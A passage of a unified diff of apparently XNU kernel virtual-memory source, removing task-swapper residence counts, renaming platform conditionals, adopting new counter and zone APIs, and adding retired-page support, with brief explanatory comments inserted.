-#endif  /* TASK_SWAPPER */
                /*
                 * vm_object_collapse (the caller of this function) is
                 * now called from contexts that may not guarantee that a
@@ -5373,9 +5343,7 @@ vm_object_populate_with_private(
                                        VM_PAGE_SET_PHYS_PAGE(m, base_page);
                                }
                        } else {
-                               while ((m = vm_page_grab_fictitious()) == VM_PAGE_NULL) {
-                                       vm_page_more_fictitious();
-                               }
+                               m = vm_page_grab_fictitious(TRUE);
 
                                /*
                                 * private normally requires lock_queues but since we
@@ -5496,7 +5464,6 @@ restart:
        object->named = TRUE;
        vm_object_lock_assert_exclusive(object);
        object->ref_count++;
-       vm_object_res_reference(object);
        while (!object->pager_ready) {
                vm_object_sleep(object,
                    VM_OBJECT_EVENT_PAGER_READY,
@@ -5579,7 +5546,6 @@ vm_object_release_name(
                        vm_object_deallocate(object);
                        return KERN_SUCCESS;
                }
-               VM_OBJ_RES_DECR(object);
                shadow = object->pageout?VM_OBJECT_NULL:object->shadow;
 
                if (object->ref_count == 1) {
@@ -6287,93 +6253,6 @@ out:
 }
 
 
-#if     TASK_SWAPPER
-/*
- * vm_object_res_deallocate
- *
- * (recursively) decrement residence counts on vm objects and their shadows.
- * Called from vm_object_deallocate and when swapping out an object.
- *
- * The object is locked, and remains locked throughout the function,
- * even as we iterate down the shadow chain.  Locks on intermediate objects
- * will be dropped, but not the original object.
- *
- * NOTE: this function used to use recursion, rather than iteration.
- */
-
-__private_extern__ void
-vm_object_res_deallocate(
-       vm_object_t     object)
-{
-       vm_object_t orig_object = object;
-       /*
-        * Object is locked so it can be called directly
-        * from vm_object_deallocate.  Original object is never
-        * unlocked.
-        */
-       assert(object->res_count > 0);
-       while (--object->res_count == 0) {
-               assert(object->ref_count >= object->res_count);
-               vm_object_deactivate_all_pages(object);
-               /* iterate on shadow, if present */
-               if (object->shadow != VM_OBJECT_NULL) {
-                       vm_object_t tmp_object = object->shadow;
-                       vm_object_lock(tmp_object);
-                       if (object != orig_object) {
-                               vm_object_unlock(object);
-                       }
-                       object = tmp_object;
-                       assert(object->res_count > 0);
-               } else {
-                       break;
-               }
-       }
-       if (object != orig_object) {
-               vm_object_unlock(object);
-       }
-}
-
-/*
- * vm_object_res_reference
- *
- * Internal function to increment residence count on a vm object
- * and its shadows.  It is called only from vm_object_reference, and
- * when swapping in a vm object, via vm_map_swap.
- *
- * The object is locked, and remains locked throughout the function,
- * even as we iterate down the shadow chain.  Locks on intermediate objects
- * will be dropped, but not the original object.
- *
- * NOTE: this function used to use recursion, rather than iteration.
- */
-
-__private_extern__ void
-vm_object_res_reference(
-       vm_object_t     object)
-{
-       vm_object_t orig_object = object;
-       /*
-        * Object is locked, so this can be called directly
-        * from vm_object_reference.  This lock is never released.
-        */
-       while ((++object->res_count == 1) &&
-           (object->shadow != VM_OBJECT_NULL)) {
-               vm_object_t tmp_object = object->shadow;
-
-               assert(object->ref_count >= object->res_count);
-               vm_object_lock(tmp_object);
-               if (object != orig_object) {
-                       vm_object_unlock(object);
-               }
-               object = tmp_object;
-       }
-       if (object != orig_object) {
-               vm_object_unlock(object);
-       }
-       assert(orig_object->ref_count >= orig_object->res_count);
-}
-#endif  /* TASK_SWAPPER */
-
 /*
  *     vm_object_reference:
  *
@@ -6576,9 +6455,6 @@ MACRO_END
        /* "ref_count" refers to the object not its contents */
        assert(object1->ref_count >= 1);
        assert(object2->ref_count >= 1);
-#if TASK_SWAPPER
-       /* "res_count" refers to the object not its contents */
-#endif
        /* "resident_page_count" was updated above when transposing pages */
        /* "wired_page_count" was updated above when transposing pages */
 #if !VM_TAG_ACTIVE_UPDATE
@@ -6597,11 +6473,11 @@ MACRO_END
        __TRANSPOSE_FIELD(pager_control);
        /* update the memory_objects' pointers back to the VM objects */
        if (object1->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-               memory_object_control_collapse(object1->pager_control,
+               memory_object_control_collapse(&object1->pager_control,
                    object1);
        }
        if (object2->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-               memory_object_control_collapse(object2->pager_control,
+               memory_object_control_collapse(&object2->pager_control,
                    object2);
        }
        __TRANSPOSE_FIELD(copy_strategy);
@@ -6754,11 +6630,11 @@ extern int speculative_reads_disabled;
  * that could give us non-page-size aligned values if we start out with values that
  * are odd multiples of PAGE_SIZE.
  */
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 unsigned int preheat_max_bytes = (1024 * 512);
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 unsigned int preheat_max_bytes = MAX_UPL_TRANSFER_BYTES;
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 unsigned int preheat_min_bytes = (1024 * 32);
 
 
@@ -6821,7 +6697,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start,
        min_ph_size = round_page(preheat_min_bytes);
        max_ph_size = round_page(preheat_max_bytes);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (isSSD) {
                min_ph_size /= 2;
                max_ph_size /= 8;
@@ -6834,7 +6710,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start,
                        max_ph_size = trunc_page(max_ph_size);
                }
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        if (min_ph_size < PAGE_SIZE) {
                min_ph_size = PAGE_SIZE;
@@ -8779,9 +8655,7 @@ again:
                vm_object_unlock(object);
        }
 
-       if (__improbable(task->task_volatile_objects != 0 ||
-           task->task_nonvolatile_objects != 0 ||
-           task->task_owned_objects != 0)) {
+       if (__improbable(task->task_owned_objects != 0)) {
                panic("%s(%p): volatile=%d nonvolatile=%d owned=%d q=%p q_first=%p q_last=%p",
                    __FUNCTION__,
                    task,
index 6399f95d093b23100547bd823fa90a05443ceac0..f05742914e9cc503e60a721d54963ec62f9fef4d 100644
@@ -69,7 +69,6 @@
 #include <debug.h>
 #include <mach_assert.h>
 #include <mach_pagemap.h>
-#include <task_swapper.h>
 
 #include <mach/kern_return.h>
 #include <mach/boolean.h>
@@ -429,6 +428,9 @@ vm_object_t     kernel_object;          /* the single kernel object */
 extern
 vm_object_t     compressor_object;      /* the single compressor object */
 
+extern
+vm_object_t     retired_pages_object;   /* holds VM pages which should never be used */
+
 extern
 unsigned int    vm_object_absent_max;   /* maximum number of absent pages
                                          *  at a time for each object */
@@ -604,24 +606,6 @@ __private_extern__ vm_object_t  vm_object_allocate(vm_object_size_t size);
 __private_extern__ void    _vm_object_allocate(vm_object_size_t size,
     vm_object_t object);
 
-#if     TASK_SWAPPER
-
-__private_extern__ void vm_object_res_reference(
-       vm_object_t             object);
-__private_extern__ void vm_object_res_deallocate(
-       vm_object_t             object);
-#define VM_OBJ_RES_INCR(object) (object)->res_count++
-#define VM_OBJ_RES_DECR(object) (object)->res_count--
-
-#else   /* TASK_SWAPPER */
-
-#define VM_OBJ_RES_INCR(object)
-#define VM_OBJ_RES_DECR(object)
-#define vm_object_res_reference(object)
-#define vm_object_res_deallocate(object)
-
-#endif  /* TASK_SWAPPER */
-
 #define vm_object_reference_locked(object)              \
        MACRO_BEGIN                                     \
        vm_object_t RLObject = (object);                \
@@ -629,19 +613,16 @@ __private_extern__ void vm_object_res_deallocate(
        assert((RLObject)->ref_count > 0);              \
        (RLObject)->ref_count++;                        \
        assert((RLObject)->ref_count > 1);              \
-       vm_object_res_reference(RLObject);              \
        MACRO_END
 
 
-#define vm_object_reference_shared(object)                              \
-       MACRO_BEGIN                                                     \
-       vm_object_t RLObject = (object);                                \
-       vm_object_lock_assert_shared(object);                           \
-       assert((RLObject)->ref_count > 0);                              \
+#define vm_object_reference_shared(object)              \
+       MACRO_BEGIN                                     \
+       vm_object_t RLObject = (object);                \
+       vm_object_lock_assert_shared(object);           \
+       assert((RLObject)->ref_count > 0);              \
        OSAddAtomic(1, &(RLObject)->ref_count);         \
-       assert((RLObject)->ref_count > 0);                              \
-       /* XXX we would need an atomic version of the following ... */  \
-       vm_object_res_reference(RLObject);                              \
+       assert((RLObject)->ref_count > 0);              \
        MACRO_END
 
 
index 164a3614512cc52b4f66f8f61efca9262c143173..d4542fd10c1fcc88597ef77b14ca37633418a64e 100644
@@ -1423,6 +1423,9 @@ extern void             vm_page_create(
        ppnum_t         start,
        ppnum_t         end);
 
+extern void             vm_page_create_retired(
+       ppnum_t         pn);
+
 extern vm_page_t        kdp_vm_page_lookup(
        vm_object_t             object,
        vm_object_offset_t      offset);
@@ -1431,18 +1434,16 @@ extern vm_page_t        vm_page_lookup(
        vm_object_t             object,
        vm_object_offset_t      offset);
 
-extern vm_page_t        vm_page_grab_fictitious(void);
+extern vm_page_t        vm_page_grab_fictitious(boolean_t canwait);
 
-extern vm_page_t        vm_page_grab_guard(void);
+extern vm_page_t        vm_page_grab_guard(boolean_t canwait);
 
 extern void             vm_page_release_fictitious(
        vm_page_t page);
 
 extern void             vm_free_delayed_pages(void);
 
-extern void             vm_page_more_fictitious(void);
-
-extern int              vm_pool_low(void);
+extern bool             vm_pool_low(void);
 
 extern vm_page_t        vm_page_grab(void);
 extern vm_page_t        vm_page_grab_options(int flags);
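
vm_page_grab_fictitious() and vm_page_grab_guard() now take a canwait argument, and vm_page_more_fictitious() goes away: the grab-and-retry loop callers used to spell out (via the VM_PAGE_GRAB_FICTITIOUS macro, deleted below) moves into the callee. A hedged sketch of that shape, with toy names and stubs rather than the real vm_resident.c code:

#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

struct toy_page { int dummy; };

static struct toy_page pool[4];
static int pool_used;

static struct toy_page *
toy_try_grab(void)
{
    return (pool_used < 4) ? &pool[pool_used++] : NULL;
}

static bool
toy_replenish(void)
{
    return false;                  /* pretend no more pages can be created */
}

static struct toy_page *
toy_grab_fictitious(bool canwait)
{
    struct toy_page *p;

    while ((p = toy_try_grab()) == NULL) {
        if (!canwait || !toy_replenish()) {
            return NULL;           /* give up instead of blocking, to keep the toy finite */
        }
    }
    return p;
}

int main(void)
{
    printf("%s\n", toy_grab_fictitious(true) ? "got a page" : "pool empty");
    return 0;
}
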
@@ -1466,10 +1467,6 @@ extern vm_page_t        vm_page_alloc(
        vm_object_t             object,
        vm_object_offset_t      offset);
 
-extern vm_page_t        vm_page_alloc_guard(
-       vm_object_t             object,
-       vm_object_offset_t      offset);
-
 extern void             vm_page_init(
        vm_page_t       page,
        ppnum_t         phys_page,
@@ -1630,15 +1627,15 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
 
 #else /* CONFIG_JETSAM */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #define VM_CHECK_MEMORYSTATUS do {} while(0)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define VM_CHECK_MEMORYSTATUS   vm_pressure_response()
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #endif /* CONFIG_JETSAM */
 
@@ -1647,7 +1644,7 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
  * protected by the object lock.
  */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define SET_PAGE_DIRTY(m, set_pmap_modified)                            \
                MACRO_BEGIN                                             \
                vm_page_t __page__ = (m);                               \
@@ -1659,13 +1656,13 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
                }                                                       \
                __page__->vmp_dirty = TRUE;                             \
                MACRO_END
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 #define SET_PAGE_DIRTY(m, set_pmap_modified)                            \
                MACRO_BEGIN                                             \
                vm_page_t __page__ = (m);                               \
                __page__->vmp_dirty = TRUE;                             \
                MACRO_END
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define PAGE_ASSERT_WAIT(m, interruptible)                      \
                (((m)->vmp_wanted = TRUE),                      \
@@ -1702,12 +1699,6 @@ extern void memorystatus_pages_update(unsigned int pages_avail);
                vm_page_free_unlocked(p, TRUE); \
                MACRO_END
 
-#define VM_PAGE_GRAB_FICTITIOUS(M)                                      \
-               MACRO_BEGIN                                             \
-               while ((M = vm_page_grab_fictitious()) == VM_PAGE_NULL) \
-                       vm_page_more_fictitious();                      \
-               MACRO_END
-
 #define VM_PAGE_WAIT()          ((void)vm_page_wait(THREAD_UNINT))
 
 #define vm_page_queue_lock (vm_page_locks.vm_page_queue_lock2)
@@ -1860,5 +1851,7 @@ extern void start_secluded_suppression(task_t);
 extern void stop_secluded_suppression(task_t);
 #endif /* CONFIG_SECLUDED_MEMORY */
 
+extern void vm_retire_boot_pages(void);
+extern uint32_t vm_retired_pages_count(void);
 
 #endif  /* _VM_VM_PAGE_H_ */
index 63dd004ea1de41ae93fe6a1c0a68d764cf75cee8..416921ce30aa9f004041ac373ef5cdfceaca7f43 100644
@@ -82,7 +82,7 @@
 #include <mach/sdt.h>
 
 #include <kern/kern_types.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/host_statistics.h>
 #include <kern/machine.h>
 #include <kern/misc_protos.h>
@@ -151,11 +151,11 @@ thread_t  vm_pageout_scan_thread = THREAD_NULL;
 boolean_t vps_dynamic_priority_enabled = FALSE;
 
 #ifndef VM_PAGEOUT_BURST_INACTIVE_THROTTLE  /* maximum iterations of the inactive queue w/o stealing/cleaning a page */
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 1024
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 4096
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif
 
 #ifndef VM_PAGEOUT_DEADLOCK_RELIEF
@@ -214,11 +214,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
  */
 
 #ifndef VM_PAGE_FREE_TARGET
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_TARGET(free)       (15 + (free) / 100)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_TARGET(free)       (15 + (free) / 80)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_FREE_TARGET */
 
 
@@ -228,22 +228,22 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
  */
 
 #ifndef VM_PAGE_FREE_MIN
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_MIN(free)          (10 + (free) / 200)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_MIN(free)          (10 + (free) / 100)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_FREE_MIN */
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_FREE_RESERVED_LIMIT     100
 #define VM_PAGE_FREE_MIN_LIMIT          1500
 #define VM_PAGE_FREE_TARGET_LIMIT       2000
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_FREE_RESERVED_LIMIT     1700
 #define VM_PAGE_FREE_MIN_LIMIT          3500
 #define VM_PAGE_FREE_TARGET_LIMIT       4000
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 /*
  *     When vm_page_free_count falls below vm_page_free_reserved,
@@ -269,11 +269,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE;
 #define VM_PAGE_REACTIVATE_LIMIT_MAX 20000
 
 #ifndef VM_PAGE_REACTIVATE_LIMIT
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define VM_PAGE_REACTIVATE_LIMIT(avail) (VM_PAGE_INACTIVE_TARGET(avail) / 2)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define VM_PAGE_REACTIVATE_LIMIT(avail) (MAX((avail) * 1 / 20,VM_PAGE_REACTIVATE_LIMIT_MAX))
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 #endif  /* VM_PAGE_REACTIVATE_LIMIT */
 #define VM_PAGEOUT_INACTIVE_FORCE_RECLAIM       1000
 
@@ -315,9 +315,9 @@ boolean_t vm_pageout_running = FALSE;
 uint32_t vm_page_upl_tainted = 0;
 uint32_t vm_page_iopl_tainted = 0;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static boolean_t vm_pageout_waiter  = FALSE;
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 #if DEVELOPMENT || DEBUG
@@ -446,7 +446,7 @@ vm_pageout_object_terminate(
 
                        if (m->vmp_dirty) {
                                vm_page_unwire(m, TRUE);        /* reactivates */
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                                PAGE_WAKEUP_DONE(m);
                        } else {
                                vm_page_free(m);  /* clears busy, etc. */
@@ -1587,7 +1587,7 @@ update_vm_info(void)
        vm_pageout_stats[vm_pageout_stat_now].phantom_ghosts_added = (unsigned int)(tmp - last.vm_phantom_cache_added_ghost);
        last.vm_phantom_cache_added_ghost = tmp;
 
-       tmp64 = get_pages_grabbed_count();
+       tmp64 = counter_load(&vm_page_grab_count);
        vm_pageout_stats[vm_pageout_stat_now].pages_grabbed = (unsigned int)(tmp64 - last_vm_page_pages_grabbed);
        last_vm_page_pages_grabbed = tmp64;
 
@@ -2299,8 +2299,6 @@ vps_flow_control(struct flow_control *flow_control, int *anons_grabbed, vm_objec
        iq->pgo_throttled = TRUE;
        assert_wait_timeout((event_t) &iq->pgo_laundry, THREAD_INTERRUPTIBLE, msecs, 1000 * NSEC_PER_USEC);
 
-       counter(c_vm_pageout_scan_block++);
-
        vm_page_unlock_queues();
 
        assert(vm_pageout_scan_wants_object == VM_OBJECT_NULL);
@@ -2478,7 +2476,7 @@ want_anonymous:
                                                vm_pageout_vminfo.vm_pageout_filecache_min_reactivated++;
 
                                                vm_page_activate(m);
-                                               VM_STAT_INCR(reactivations);
+                                               counter_inc(&vm_statistics_reactivations);
 #if CONFIG_BACKGROUND_QUEUE
 #if DEVELOPMENT || DEBUG
                                                if (*is_page_from_bg_q == TRUE) {
@@ -2748,7 +2746,7 @@ vps_deal_with_throttled_queues(vm_page_t m, vm_object_t *object, uint32_t *vm_pa
 #endif /* CONFIG_MEMORYSTATUS && CONFIG_JETSAM */
        } else {
                vm_page_activate(m);
-               VM_STAT_INCR(reactivations);
+               counter_inc(&vm_statistics_reactivations);
 
 #if CONFIG_BACKGROUND_QUEUE
 #if DEVELOPMENT || DEBUG
@@ -3418,7 +3416,7 @@ reactivate_page:
                                         * The page was/is being used, so put back on active list.
                                         */
                                        vm_page_activate(m);
-                                       VM_STAT_INCR(reactivations);
+                                       counter_inc(&vm_statistics_reactivations);
                                        inactive_burst_count = 0;
                                }
 #if CONFIG_BACKGROUND_QUEUE
@@ -3727,22 +3725,21 @@ vm_pageout_continue(void)
        assert_wait((event_t) &vm_page_free_wanted, THREAD_UNINT);
 
        vm_pageout_running = FALSE;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (vm_pageout_waiter) {
                vm_pageout_waiter = FALSE;
                thread_wakeup((event_t)&vm_pageout_waiter);
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        lck_mtx_unlock(&vm_page_queue_free_lock);
        vm_page_unlock_queues();
 
-       counter(c_vm_pageout_block++);
        thread_block((thread_continue_t)vm_pageout_continue);
        /*NOTREACHED*/
 }
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 kern_return_t
 vm_pageout_wait(uint64_t deadline)
 {
@@ -3761,7 +3758,7 @@ vm_pageout_wait(uint64_t deadline)
 
        return kr;
 }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 static void
@@ -4232,7 +4229,7 @@ vm_pageout_compress_page(void **current_chead, char *scratch_buf, vm_page_t m)
                        vm_object_owner_compressed_update(object,
                            +1);
                }
-               VM_STAT_INCR(compressions);
+               counter_inc(&vm_statistics_compressions);
 
                if (m->vmp_tabled) {
                        vm_page_remove(m, TRUE);
@@ -4380,16 +4377,16 @@ vm_pressure_response(void)
                return;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
        available_memory = (uint64_t) memorystatus_available_pages;
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
        available_memory = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY;
        memorystatus_available_pages = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY;
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
        total_pages = (unsigned int) atop_64(max_mem);
 #if CONFIG_SECLUDED_MEMORY
@@ -4582,7 +4579,7 @@ void
 vm_pageout_garbage_collect(int collect)
 {
        if (collect) {
-               if (is_zone_map_nearing_exhaustion()) {
+               if (zone_map_nearing_exhaustion()) {
                        /*
                         * Woken up by the zone allocator for zone-map-exhaustion jetsams.
                         *
@@ -4600,7 +4597,7 @@ vm_pageout_garbage_collect(int collect)
                         * ok; if memory pressure persists, the thread will simply be woken
                         * up again.
                         */
-                       consider_zone_gc(TRUE);
+                       zone_gc(ZONE_GC_JETSAM);
                } else {
                        /* Woken up by vm_pageout_scan or compute_pageout_gc_throttle. */
                        boolean_t buf_large_zfree = FALSE;
@@ -4617,10 +4614,10 @@ vm_pageout_garbage_collect(int collect)
                                }
                                if (first_try == TRUE || buf_large_zfree == TRUE) {
                                        /*
-                                        * consider_zone_gc should be last, because the other operations
+                                        * zone_gc should be last, because the other operations
                                         * might return memory to zones.
                                         */
-                                       consider_zone_gc(FALSE);
+                                       zone_gc(ZONE_GC_TRIM);
                                }
                                first_try = FALSE;
                        } while (buf_large_zfree == TRUE && vm_page_free_count < vm_page_free_target);
@@ -4872,13 +4869,22 @@ vm_pageout(void)
        thread_set_thread_name(vm_pageout_state.vm_pageout_external_iothread, "VM_pageout_external_iothread");
        thread_deallocate(vm_pageout_state.vm_pageout_external_iothread);
 
-       result = kernel_thread_start_priority((thread_continue_t)vm_pageout_garbage_collect, NULL,
+       result = kernel_thread_create((thread_continue_t)vm_pageout_garbage_collect, NULL,
            BASEPRI_DEFAULT,
            &thread);
        if (result != KERN_SUCCESS) {
                panic("vm_pageout_garbage_collect: create failed");
        }
        thread_set_thread_name(thread, "VM_pageout_garbage_collect");
+       if (thread->reserved_stack == 0) {
+               assert(thread->kernel_stack);
+               thread->reserved_stack = thread->kernel_stack;
+       }
+
+       thread_mtx_lock(thread);
+       thread_start(thread);
+       thread_mtx_unlock(thread);
+
        thread_deallocate(thread);
 
 #if VM_PRESSURE_EVENTS
@@ -5010,15 +5016,15 @@ vm_pageout_internal_start(void)
 
        assert(hinfo.max_cpus > 0);
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        vm_pageout_state.vm_compressor_thread_count = 1;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        if (hinfo.max_cpus > 4) {
                vm_pageout_state.vm_compressor_thread_count = 2;
        } else {
                vm_pageout_state.vm_compressor_thread_count = 1;
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        PE_parse_boot_argn("vmcomp_threads", &vm_pageout_state.vm_compressor_thread_count,
            sizeof(vm_pageout_state.vm_compressor_thread_count));
 
@@ -5339,27 +5345,19 @@ must_throttle_writes()
 #define MAX_DELAYED_WORK_CTX_ALLOCATED  (512)
 
 int vm_page_delayed_work_ctx_needed = 0;
-zone_t  dw_ctx_zone = ZONE_NULL;
+SECURITY_READ_ONLY_LATE(zone_t) dw_ctx_zone;
 
 void
 vm_page_delayed_work_init_ctx(void)
 {
-       int nelems = 0, elem_size = 0;
-
-       elem_size = sizeof(struct vm_page_delayed_work_ctx);
+       size_t elem_size = sizeof(struct vm_page_delayed_work_ctx);
 
        dw_ctx_zone = zone_create_ext("delayed-work-ctx", elem_size,
            ZC_NOGC, ZONE_ID_ANY, ^(zone_t z) {
-               zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED * elem_size);
+               zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED);
        });
 
-       nelems = zfill(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED);
-       if (nelems < MIN_DELAYED_WORK_CTX_ALLOCATED) {
-               printf("vm_page_delayed_work_init_ctx: Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED);
-#if DEVELOPMENT || DEBUG
-               panic("Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED);
-#endif /* DEVELOPMENT || DEBUG */
-       }
+       zone_fill_initially(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED);
 }
 
 struct vm_page_delayed_work*
@@ -5578,7 +5576,7 @@ vm_object_upl_request(
                    "object %p shadow_offset 0x%llx",
                    upl->map_object, upl->map_object->vo_shadow_offset);
 
-               VM_PAGE_GRAB_FICTITIOUS(alias_page);
+               alias_page = vm_page_grab_fictitious(TRUE);
 
                upl->flags |= UPL_SHADOWED;
        }
@@ -5648,11 +5646,11 @@ vm_object_upl_request(
        if ((cntrl_flags & UPL_WILL_MODIFY) && must_throttle_writes() == TRUE) {
                boolean_t       isSSD = FALSE;
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                isSSD = TRUE;
-#else
+#else /* !XNU_TARGET_OS_OSX */
                vnode_pager_get_isSSD(object->pager, &isSSD);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                vm_object_unlock(object);
 
                OSAddAtomic(size_in_pages, &vm_upl_wait_for_pages);
@@ -5672,7 +5670,7 @@ vm_object_upl_request(
 
                if ((alias_page == NULL) && !(cntrl_flags & UPL_SET_LITE)) {
                        vm_object_unlock(object);
-                       VM_PAGE_GRAB_FICTITIOUS(alias_page);
+                       alias_page = vm_page_grab_fictitious(TRUE);
                        vm_object_lock(object);
                }
                if (cntrl_flags & UPL_COPYOUT_FROM) {
@@ -6030,7 +6028,7 @@ check_busy:
                                        dst_page->vmp_clustered = TRUE;
 
                                        if (!(cntrl_flags & UPL_FILE_IO)) {
-                                               VM_STAT_INCR(pageins);
+                                               counter_inc(&vm_statistics_pageins);
                                        }
                                }
                        }
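
These VM_STAT_INCR() sites now use the scalable counter API pulled in via <kern/counter.h> further below; a minimal usage sketch, with behavioral comments that are an assumption based on the call sites in this diff:

    #include <kern/counter.h>

    counter_inc(&vm_statistics_pageins);                    /* handles preemption itself */
    counter_inc_preemption_disabled(&vm_page_grab_count);   /* caller already non-preemptible */
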
@@ -6201,7 +6199,7 @@ check_busy:
 try_next_page:
                if (dwp->dw_mask) {
                        if (dwp->dw_mask & DW_vm_page_activate) {
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                        }
 
                        VM_PAGE_ADD_DELAYED_WORK(dwp, dst_page, dw_count);
@@ -6462,7 +6460,7 @@ REDISCOVER_ENTRY:
                goto done;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        if (map->pmap != kernel_pmap &&
            (caller_flags & UPL_COPYOUT_FROM) &&
            (entry->protection & VM_PROT_EXECUTE) &&
@@ -6531,7 +6529,7 @@ REDISCOVER_ENTRY:
 #endif /* DEVELOPMENT || DEBUG */
                goto done;
        }
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
        local_object = VME_OBJECT(entry);
        assert(local_object != VM_OBJECT_NULL);
@@ -6637,24 +6635,6 @@ REDISCOVER_ENTRY:
                vm_map_t                real_map;
                vm_prot_t               fault_type;
 
-               if (entry->vme_start < VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)) ||
-                   entry->vme_end > VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))) {
-                       /*
-                        * Clip the requested range first to minimize the
-                        * amount of potential copying...
-                        */
-                       if (vm_map_lock_read_to_write(map)) {
-                               goto REDISCOVER_ENTRY;
-                       }
-                       vm_map_lock_assert_exclusive(map);
-                       assert(VME_OBJECT(entry) == local_object);
-                       vm_map_clip_start(map, entry,
-                           VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)));
-                       vm_map_clip_end(map, entry,
-                           VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map)));
-                       vm_map_lock_write_to_read(map);
-               }
-
                local_map = map;
 
                if (caller_flags & UPL_COPYOUT_FROM) {
@@ -7009,7 +6989,7 @@ process_upl_to_enter:
                        assert(pg_num == new_offset / PAGE_SIZE);
 
                        if (lite_list[pg_num >> 5] & (1U << (pg_num & 31))) {
-                               VM_PAGE_GRAB_FICTITIOUS(alias_page);
+                               alias_page = vm_page_grab_fictitious(TRUE);
 
                                vm_object_lock(object);
 
@@ -7739,7 +7719,7 @@ process_upl_to_commit:
                                dwp->dw_mask |= DW_vm_page_activate | DW_PAGE_WAKEUP;
 
                                if (upl->flags & UPL_PAGEOUT) {
-                                       VM_STAT_INCR(reactivations);
+                                       counter_inc(&vm_statistics_reactivations);
                                        DTRACE_VM2(pgrec, int, 1, (uint64_t *), NULL);
                                }
                        } else {
@@ -7780,7 +7760,7 @@ process_upl_to_commit:
                if (hibernate_cleaning_in_progress == FALSE && !m->vmp_dirty && (upl->flags & UPL_PAGEOUT)) {
                        pgpgout_count++;
 
-                       VM_STAT_INCR(pageouts);
